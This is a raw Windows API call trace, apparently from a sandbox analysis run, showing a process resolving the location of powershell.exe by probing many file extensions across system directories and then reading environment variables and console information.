	[0587.343] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.344] SetErrorMode (uMode=0x1) returned 0x1
	[0587.344] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0587.344] SetErrorMode (uMode=0x1) returned 0x1
	[0587.344] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.344] SetErrorMode (uMode=0x1) returned 0x1
	[0587.344] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0587.345] SetErrorMode (uMode=0x1) returned 0x1
	[0587.345] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.345] SetErrorMode (uMode=0x1) returned 0x1
	[0587.345] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0587.346] SetErrorMode (uMode=0x1) returned 0x1
	[0587.346] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.347] SetErrorMode (uMode=0x1) returned 0x1
	[0587.347] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0587.347] SetErrorMode (uMode=0x1) returned 0x1
	[0587.347] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.347] SetErrorMode (uMode=0x1) returned 0x1
	[0587.348] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0587.348] SetErrorMode (uMode=0x1) returned 0x1
	[0587.348] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.348] SetErrorMode (uMode=0x1) returned 0x1
	[0587.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0587.348] SetErrorMode (uMode=0x1) returned 0x1
	[0587.348] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.349] SetErrorMode (uMode=0x1) returned 0x1
	[0587.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0587.349] SetErrorMode (uMode=0x1) returned 0x1
	[0587.349] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.349] SetErrorMode (uMode=0x1) returned 0x1
	[0587.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0587.350] SetErrorMode (uMode=0x1) returned 0x1
	[0587.350] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.350] SetErrorMode (uMode=0x1) returned 0x1
	[0587.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0587.350] SetErrorMode (uMode=0x1) returned 0x1
	[0587.350] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.351] SetErrorMode (uMode=0x1) returned 0x1
	[0587.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0587.351] SetErrorMode (uMode=0x1) returned 0x1
	[0587.351] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.351] SetErrorMode (uMode=0x1) returned 0x1
	[0587.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0587.352] SetErrorMode (uMode=0x1) returned 0x1
	[0587.352] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.352] SetErrorMode (uMode=0x1) returned 0x1
	[0587.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0587.352] SetErrorMode (uMode=0x1) returned 0x1
	[0587.352] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.353] SetErrorMode (uMode=0x1) returned 0x1
	[0587.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0587.353] SetErrorMode (uMode=0x1) returned 0x1
	[0587.353] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.353] SetErrorMode (uMode=0x1) returned 0x1
	[0587.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0587.353] SetErrorMode (uMode=0x1) returned 0x1
	[0587.354] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.354] SetErrorMode (uMode=0x1) returned 0x1
	[0587.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0587.354] SetErrorMode (uMode=0x1) returned 0x1
	[0587.354] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.355] SetErrorMode (uMode=0x1) returned 0x1
	[0587.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0587.355] SetErrorMode (uMode=0x1) returned 0x1
	[0587.355] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.355] SetErrorMode (uMode=0x1) returned 0x1
	[0587.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0587.356] SetErrorMode (uMode=0x1) returned 0x1
	[0587.356] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.356] SetErrorMode (uMode=0x1) returned 0x1
	[0587.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0587.356] SetErrorMode (uMode=0x1) returned 0x1
	[0587.356] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.357] SetErrorMode (uMode=0x1) returned 0x1
	[0587.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0587.357] SetErrorMode (uMode=0x1) returned 0x1
	[0587.357] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.357] SetErrorMode (uMode=0x1) returned 0x1
	[0587.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0587.358] SetErrorMode (uMode=0x1) returned 0x1
	[0587.358] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.358] SetErrorMode (uMode=0x1) returned 0x1
	[0587.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0587.358] SetErrorMode (uMode=0x1) returned 0x1
	[0587.358] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.359] SetErrorMode (uMode=0x1) returned 0x1
	[0587.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0587.359] SetErrorMode (uMode=0x1) returned 0x1
	[0587.359] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.359] SetErrorMode (uMode=0x1) returned 0x1
	[0587.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0587.360] SetErrorMode (uMode=0x1) returned 0x1
	[0587.360] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.360] SetErrorMode (uMode=0x1) returned 0x1
	[0587.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0587.360] SetErrorMode (uMode=0x1) returned 0x1
	[0587.360] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.361] SetErrorMode (uMode=0x1) returned 0x1
	[0587.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0587.361] SetErrorMode (uMode=0x1) returned 0x1
	[0587.361] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x3389d0
	[0587.362] FindNextFileW (in: hFindFile=0x3389d0, lpFindFileData=0x1c7ed930 | out: lpFindFileData=0x1c7ed930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0587.362] FindClose (in: hFindFile=0x3389d0 | out: hFindFile=0x3389d0) returned 1
	[0587.362] SetErrorMode (uMode=0x1) returned 0x1
	[0587.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7eda40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0587.363] SetErrorMode (uMode=0x1) returned 0x1
	[0587.364] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7edc50 | out: lpFileInformation=0x1c7edc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0587.364] SetErrorMode (uMode=0x1) returned 0x1
	[0587.365] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0587.365] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0587.365] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0587.366] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0587.366] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0587.366] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0587.370] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0587.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0587.370] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0589.362] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0589.362] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0589.362] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0589.375] CoTaskMemAlloc (cb=0x3b) returned 0x1b710560
	[0589.375] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7ede38, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7ede38) returned 0x4550
	[0589.385] CoTaskMemFree (pv=0x1b710560) 
	[0589.388] GetConsoleWindow () returned 0x1035e
	[0589.396] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0589.396] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0589.396] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0593.771] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
